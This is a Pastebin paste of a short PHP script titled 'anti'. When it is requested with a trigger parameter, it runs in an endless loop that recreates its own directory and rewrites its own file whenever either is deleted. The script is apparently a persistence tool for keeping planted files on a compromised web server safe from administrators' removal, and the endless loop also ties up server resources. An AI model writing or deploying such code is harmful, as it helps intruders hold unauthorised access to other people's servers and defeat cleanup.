zeerx7

anti

Sep 13th, 2020 (edited)
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.34 KB | None | 0 0
  1. <?php
  2. /* Coded by Zeerx7 */
  3. if($_GET['anti'] == 'del'){
  4. ignore_user_abort(true);
  5. set_time_limit(0);
  6. $pausi = __FILE__;
  7. $gans  = __DIR__;
  8. $ox = file_get_contents($pausi);
  9. while(True){
  10.     if(!is_dir($gans)){
  11.        mkdir($gans,0755, true);
  12.     }
  13.     if(!file_exists($pausi)){
  14.         fwrite(fopen($pausi,'w'), $ox);
  15.     }
  16. }
  17. }
  18. ?>
Add Comment
Please, Sign In to add comment